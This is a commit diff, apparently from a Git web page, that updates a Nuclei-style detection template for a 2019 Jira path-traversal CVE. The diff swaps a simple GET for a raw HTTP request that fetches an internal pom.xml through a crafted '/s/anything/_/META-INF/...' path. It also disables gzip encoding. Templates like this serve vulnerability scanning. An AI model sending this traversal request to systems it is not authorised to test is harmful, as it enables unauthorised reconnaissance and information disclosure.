Fixed an issue with gzip encoding
parent
9cb97df4e9
commit
4a5ef01b48
|
@ -6,9 +6,14 @@ info:
|
||||||
tags: cve,cve2019,atlassian,jira,traversal
|
tags: cve,cve2019,atlassian,jira,traversal
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- raw:
|
||||||
path:
|
- |
|
||||||
- "{{BaseURL}}/s/anything/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml"
|
GET /s/anything/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
|
||||||
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||||
|
Accept-Language: en-US,en;q=0.5
|
||||||
|
Accept-Encoding: deflate
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
@ -18,4 +23,4 @@ requests:
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- <groupId>com.atlassian.jira</groupId>
|
- <groupId>com.atlassian.jira</groupId>
|
||||||
part: body
|
part: body
|
Loading…
Reference in New Issue